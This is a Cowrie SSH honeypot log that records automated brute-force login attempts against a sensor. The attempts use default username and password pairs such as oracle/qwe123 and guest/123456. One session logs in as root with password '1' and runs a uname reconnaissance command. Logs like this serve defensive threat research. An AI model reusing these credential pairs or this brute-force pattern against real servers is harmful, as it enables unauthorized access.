{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:34:56.198261Z","src_ip":"83.168.105.65","session":"fde81fff5ce5"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin","message":"login attempt [gpadmin/gpadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:56.310207Z","src_ip":"83.168.105.65","session":"fde81fff5ce5"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:57.222018Z","src_ip":"212.227.125.160","session":"fc3966086390"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:57.349514Z","src_ip":"83.168.105.65","session":"fde81fff5ce5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40888,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bbdb18c3e7d","protocol":"ssh","message":"New connection: 212.227.125.160:40888 (1.2.3.4:22) [session: 7bbdb18c3e7d]","sensor":"my-vps","timestamp":"2025-08-26T11:35:01.912939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:35:01.913875Z","src_ip":"212.227.125.160","session":"7bbdb18c3e7d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:35:01.976367Z","src_ip":"212.227.125.160","session":"7bbdb18c3e7d"}
{"eventid":"cowrie.login.failed","username":"ecs-user","password":"ecs-user","message":"login attempt [ecs-user/ecs-user] failed","sensor":"my-vps","timestamp":"2025-08-26T11:35:02.186961Z","src_ip":"212.227.125.160","session":"7bbdb18c3e7d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:03.269014Z","src_ip":"212.227.125.160","session":"7bbdb18c3e7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41658,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4264bb8a026","protocol":"ssh","message":"New connection: 212.227.125.160:41658 (1.2.3.4:22) [session: a4264bb8a026]","sensor":"my-vps","timestamp":"2025-08-26T11:35:08.031010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:35:08.043868Z","src_ip":"212.227.125.160","session":"a4264bb8a026"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:35:08.099399Z","src_ip":"212.227.125.160","session":"a4264bb8a026"}
{"eventid":"cowrie.login.failed","username":"username","password":"username","message":"login attempt [username/username] failed","sensor":"my-vps","timestamp":"2025-08-26T11:35:08.322788Z","src_ip":"212.227.125.160","session":"a4264bb8a026"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:09.374720Z","src_ip":"212.227.125.160","session":"a4264bb8a026"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52226,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8d35a35396b","protocol":"ssh","message":"New connection: 217.72.205.35:52226 (1.2.3.4:22) [session: b8d35a35396b]","sensor":"my-vps","timestamp":"2025-08-26T11:35:09.921223Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:09.923046Z","src_ip":"217.72.205.35","session":"b8d35a35396b"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":36356,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f42df0f8ef9","protocol":"ssh","message":"New connection: 83.168.105.65:36356 (1.2.3.4:22) [session: 3f42df0f8ef9]","sensor":"my-vps","timestamp":"2025-08-26T11:35:11.606113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:35:11.606990Z","src_ip":"83.168.105.65","session":"3f42df0f8ef9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:35:11.647474Z","src_ip":"83.168.105.65","session":"3f42df0f8ef9"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwe123","message":"login attempt [oracle/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:35:11.770682Z","src_ip":"83.168.105.65","session":"3f42df0f8ef9"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:12.813240Z","src_ip":"83.168.105.65","session":"3f42df0f8ef9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42432,"dst_ip":"1.2.3.4","dst_port":22,"session":"d83702534edf","protocol":"ssh","message":"New connection: 212.227.125.160:42432 (1.2.3.4:22) [session: d83702534edf]","sensor":"my-vps","timestamp":"2025-08-26T11:35:15.126777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:35:15.128670Z","src_ip":"212.227.125.160","session":"d83702534edf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:35:15.189346Z","src_ip":"212.227.125.160","session":"d83702534edf"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:35:15.409811Z","src_ip":"212.227.125.160","session":"d83702534edf"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:16.464083Z","src_ip":"212.227.125.160","session":"d83702534edf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43198,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d8383b49f94","protocol":"ssh","message":"New connection: 212.227.125.160:43198 (1.2.3.4:22) [session: 6d8383b49f94]","sensor":"my-vps","timestamp":"2025-08-26T11:35:19.930913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:35:19.933535Z","src_ip":"212.227.125.160","session":"6d8383b49f94"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:35:19.983098Z","src_ip":"212.227.125.160","session":"6d8383b49f94"}
{"eventid":"cowrie.login.failed","username":"jfedu1","password":"123456","message":"login attempt [jfedu1/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:35:20.188043Z","src_ip":"212.227.125.160","session":"6d8383b49f94"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:20.543014Z","src_ip":"212.227.125.160","session":"b981358e8fe3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:21.239058Z","src_ip":"212.227.125.160","session":"6d8383b49f94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43964,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8072113ff3e","protocol":"ssh","message":"New connection: 212.227.125.160:43964 (1.2.3.4:22) [session: a8072113ff3e]","sensor":"my-vps","timestamp":"2025-08-26T11:35:25.345153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:35:25.346371Z","src_ip":"212.227.125.160","session":"a8072113ff3e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:35:25.398272Z","src_ip":"212.227.125.160","session":"a8072113ff3e"}
{"eventid":"cowrie.login.failed","username":"amp","password":"amp","message":"login attempt [amp/amp] failed","sensor":"my-vps","timestamp":"2025-08-26T11:35:25.557557Z","src_ip":"212.227.125.160","session":"a8072113ff3e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:26.611799Z","src_ip":"212.227.125.160","session":"a8072113ff3e"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":48226,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cedfb52a147","protocol":"ssh","message":"New connection: 83.168.105.65:48226 (1.2.3.4:22) [session: 6cedfb52a147]","sensor":"my-vps","timestamp":"2025-08-26T11:35:27.079109Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:35:27.080220Z","src_ip":"83.168.105.65","session":"6cedfb52a147"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:35:27.118572Z","src_ip":"83.168.105.65","session":"6cedfb52a147"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:35:27.275437Z","src_ip":"83.168.105.65","session":"6cedfb52a147"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:35:27.378403Z","src_ip":"83.168.105.65","session":"6cedfb52a147"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:35:27.379386Z","src_ip":"83.168.105.65","session":"6cedfb52a147"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:27.430642Z","src_ip":"83.168.105.65","session":"6cedfb52a147"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:27.431856Z","src_ip":"83.168.105.65","session":"6cedfb52a147"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44732,"dst_ip":"1.2.3.4","dst_port":22,"session":"1924657bf2bc","protocol":"ssh","message":"New connection: 212.227.125.160:44732 (1.2.3.4:22) [session: 1924657bf2bc]","sensor":"my-vps","timestamp":"2025-08-26T11:35:31.403891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:35:31.412148Z","src_ip":"212.227.125.160","session":"1924657bf2bc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:35:31.457370Z","src_ip":"212.227.125.160","session":"1924657bf2bc"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask","message":"login attempt [flask/flask] failed","sensor":"my-vps","timestamp":"2025-08-26T11:35:31.693326Z","src_ip":"212.227.125.160","session":"1924657bf2bc"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:32.754049Z","src_ip":"212.227.125.160","session":"1924657bf2bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45500,"dst_ip":"1.2.3.4","dst_port":22,"session":"44500457737b","protocol":"ssh","message":"New connection: 212.227.125.160:45500 (1.2.3.4:22) [session: 44500457737b]","sensor":"my-vps","timestamp":"2025-08-26T11:35:37.331110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:35:37.332365Z","src_ip":"212.227.125.160","session":"44500457737b"}
